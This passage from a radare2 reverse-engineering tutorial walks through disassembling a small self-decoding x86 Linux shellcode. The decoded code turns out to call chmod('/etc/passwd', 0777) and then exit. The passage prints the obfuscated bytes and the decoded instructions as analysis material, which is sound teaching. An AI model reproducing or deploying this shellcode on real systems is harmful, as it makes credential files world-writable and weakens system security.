|     0x1c00079a   32    b84010003c       mov eax, sym.shellcode
|     0x1c00079f   32    ffd0             call eax
|        ; unk()
|     0x1c0007a1   32    b800000000       mov eax, 0x0
|     0x1c0007a6   32    83c414           add esp, 0x14
|     0x1c0007a9   12-   59               pop ecx
|     0x1c0007aa    8-   5d               pop ebp
|     0x1c0007ab    4-   8d61fc           lea esp, [ecx-0x4]
\     0x1c0007ae    4    c3               ret
      ; ------------

A quick eyeballing of this code shows us what we need to know. There was enough information in our binary for radare2 to flag the byte string holding the exploit. If you want to see the actual address of this string, you can turn off the asm.filter using the e command; this will prevent radare2 from substituting symbols names for constants in disassembly views.

What does the program do with the payload? We see strlen() and printf() being called, but more importantly, we see the address of the shellcode being loaded into eax before being called (load at 0x1c00079a, call at 0x1c00079f). The obvious next step is to examine the payload to get an idea of what it might do:

[0x1c000764]> pD 60@sym.shellcode
     ,   0x3c001040  sym.shellcode:
     ,=< 0x3c001040    0    eb11             jmp 0x3c001053 [1]
     |   0x3c001042    0    5e               pop esi
     |   0x3c001043   -4-   31c9             xor ecx, ecx
     |   0x3c001045   -4    b127             mov cl, 0x27
    .--> 0x3c001047   -4    806c0eff35       sub byte [esi+ecx-0x1], 0x35
    ||   0x3c00104c   -4    80e901           sub cl, 0x1
    `==< 0x3c00104f   -4    75f6             jnz 0x3c001047 [2]
   ,===< 0x3c001051   -4    eb05             jmp 0x3c001058 [3]
   | `-> 0x3c001053   -4>   e8eaffffff       call dword 0x3c001042
   | |      ; 0x3c001042() [4]
   `---> 0x3c001058   -4    204a66           and [edx+0x66], cl
         0x3c00105b   -4    f5               cmc
         0x3c00105c   -4    e544             in eax, 0x44
         0x3c00105e   -4    90               nop
         0x3c00105f   -4    66fe9b           o16 invalid
         0x3c001062   -4    ee               out dx, al
         0x3c001063   -4    3436             xor al, 0x36
         0x3c001065   -4    02b566f5e536     add dh, [ebp+0x36e5f566]
         0x3c00106b   -4    661002           o16 adc [edx], al
         0x3c00106e   -4    b51d             mov ch, 0x1d
         0x3c001070   -4    1b3434           sbb esi, [esp+esi]
         0x3c001073   -4 string (5): "444d"
         0x3c001078   -4 hex length=64 delta=2
0x3c001078  64a5 96a8 a8ac 9900 0000 0000 0100 0000  
0x3c001088  0100 0000 0400 0000 c001 001c 0500 0000  
0x3c001098  8803 001c 0600 0000 5802 001c 0a00 0000  
0x3c0010a8  bf00 0000 0b00 0000 1000 0000 1500 0000  

I used pD here so that I could specify exactly how many bytes to disassemble (I chose 60). So what can we say about this? Well at first glance, there are some invalid operations which can't be executed, so that's a bit fishy.

What I will now is do a symbolic execution of this code in my head. We first jump to 0x3c001053, from here we call to 0x3c001042, which happens to be the instruction right after where we came from in the first place. This could be pointless, but bear in mind that the call has pushed the return address of the call onto the stack. And what do you know, they immediately pop the return address into esi. In 32-bit x86 there is no way of getting directly at the program counter; what you have just seen is a well known hack used to get it. The value of the program counter can be used to refer to code/data relative to the payload (remember that the attacker does not know where his/her code will be relocated by the linker).

So now we are at 0x3c001043 with 0x3c001058 in esi. The code zeros ecx by xoring it with itself, before loading 0x27 into the lowest byte of ecx. The next chunk of code which subtracts 0x35 from a [esi+ecx-0x1], for ecx = {0x27, 0x26, ... , 0x1} and we already know the value of esi from earlier. So by my calculations, we need to subtract 0x35 from 0x27 bytes starting at 0x3c001058 so as to emulate the effect of this self modifying code. We can do this using the 'wo' family of commands; let's ask radare2 for help on this:

[0x1c000764]> wo?
Usage: wo[asmdxoArl24] [hexpairs] @ addr[:bsize]  
  wox 0x90   ; xor cur block with 0x90
  wox 90     ; xor cur block with 0x90
  wox 0x0203 ; xor cur block with 0203
  woa 02 03  ; add [0203][0203][...] to curblk
Supported operations:  
  woa  +=  addition
  wos  -=  substraction
  wom  *=  multiply
  wod  /=  divide
  wox  ^=  xor
  woo  |=  or
  woA  &=  and
  wor  >>= shift right
  wol  <<= shift left
  wo2  2=  2 byte endian swap
  wo4  4=  4 byte endian swap

We need to use wos so as to subtract a constant from a range of memory addresses, but before that we need to turn on io caching. By default radare2 opens files read-only, unless you give the -w flag. Alternatively we can set the io.cache option on, which caches writes in memory; These writes can be reverted or committed as the user pleases, but we will not be using these facilities for this example.

[0x1c000764]> e io.cache=true
[0x1c000764]> wos 0x35@0x3c001058:0x27
[0x3c001040]> pd
      ,   0x3c001040  sym.shellcode:
      ,=< 0x3c001040    0    eb11             jmp 0x3c001053 [1]
      |   0x3c001042    0    5e               pop esi
      |   0x3c001043   -4-   31c9             xor ecx, ecx
      |   0x3c001045   -4    b127             mov cl, 0x27
     .--> 0x3c001047   -4    806c0eff35       sub byte [esi+ecx-0x1], 0x35
     ||   0x3c00104c   -4    80e901           sub cl, 0x1
     `==< 0x3c00104f   -4    75f6             jnz 0x3c001047 [2]
    ,===< 0x3c001051   -4    eb05             jmp 0x3c001058 [3]
    | `-> 0x3c001053   -4>   e8eaffffff       call dword 0x3c001042
    | |      ; 0x3c001042() [4]
   ,`---> 0x3c001058   -4    eb15             jmp 0x3c00106f [5]
   |      0x3c00105a   -4    31c0             xor eax, eax
   |      0x3c00105c   -4    b00f             mov al, 0xf
   |      0x3c00105e   -4    5b               pop ebx
   |      0x3c00105f   -8-   31c9             xor ecx, ecx
   |      0x3c001061   -8    66b9ff01         mov cx, 0x1ff
   |      0x3c001065   -8    cd80             int 0x80
   |         ; syscall[0x80][3840]=?
   |      0x3c001067   -8    31c0             xor eax, eax
   |      0x3c001069   -8    b001             mov al, 0x1
   |      0x3c00106b   -8    31db             xor ebx, ebx
   |      0x3c00106d   -8    cd80             int 0x80
   |         ; msync (0x100,0x0,0x1ff)
   `----> 0x3c00106f   -8>   e8e6ffffff       call dword 0x3c00105a
   |         ; 0x3c00105a() [6]
          0x3c001074   -8 string (5): "444d"
          0x3c001079   -8 hex length=64 delta=3
0x3c001079  7061 7373 7764 0055 2720 666f 7220 7265  passwd.U' for re  
0x3c001089  646f 0000 0000 0000 0000 0000 0000 0000  
0x3c001099  0000 0000 0000 0000 0000 0000 0000 0000  
0x3c0010a9  0000 0000 0000 0000 0000 0000 0000 0000  

And now we see that the instructions following 0x3c001058 are now valid. The first thing that I notice are these 'int 0x80' instructions. On a UNIX like operating system (running on x86/amd64), firing an 0x80 interrupt has a special meaning, it asks the kernel to execute a system call, whose number is held in eax.

By following execution mentally (through a jump and a call), I can tell you that eax takes a value of 15 at 0x3c001065 and 1 at 0x3c00106d. We can identify these Linux system calls by grokking the 32-bit x86 kernel headers, or the easy way, google for them:


NOTE actually, r2 supports three different methods for resolving syscalls on a shellcode, so there's no need to check the kernel headers anymore.

  • Use your brain
  • Use as command to analyze syscalls
  • Run esil emulation to get reg values
  • Debug de shellcode by injecting it on a real process with r2 -d

So we have a call to chmod(2) at 0x3c001065, followed by a call to exit(2) at 0x3c00106d. We will need to examine the arguments to calls in order to understand what they do. On a Linux system, system call arguments are passed in registers (ebx, ecx, edx, esi, edi, ebp).

Let's look at the call to chmod(2); This call takes two arguments, so we should look in ebx and ecx for a char pointer indicating the path to a file, and a mode_t (which is just an integer really) specifying the mode (or permissions) to change to.

ebx is popped from the top of the stack at 0x3c00105e and if we follow execution backwards, we see that the last thing on the stack was a "return address" (0x3c001074) of the call at 0x3c00106f. Ofcourse this is not a return address at all, just a sneaky way to bundle a string into the payload. Let's look at the string using 'ps':

[0x1c000764]> ps@0x3c001074

The second argument of the chmod call is in the ecx register and takes the value 0x1ff; which in octal, is 0777. So we have a call chmod("/etc/passwd", 0777);. Naughty!

After this the program simply calls the exit(2) system call.

Concluding Comments

What we have seen is an exploit which modifies itself at runtime in order to resist static disassembly. The technique is not new and is an easy way of preventing hard coded strings (like "/etc/passwd") from being detectable with utilities like strings(1) or rabin2 -z.

In fact, this exploit should not work on modern operating systems, as the payload was situated in the '.data' section of the binary, which (on any sane OS) can not be both executable and writable. I tried stepping over the call to the payload on my OpenBSD machine and it refused to execute, which is a good thing.

We explored some of the basic features of radare2, however, we have only scratched the surface. Go check it out at

If you fancy something slightly harder, try the same analysis on a stripped binary!

Please let us know if you spot any errors or have any comments. Cheers.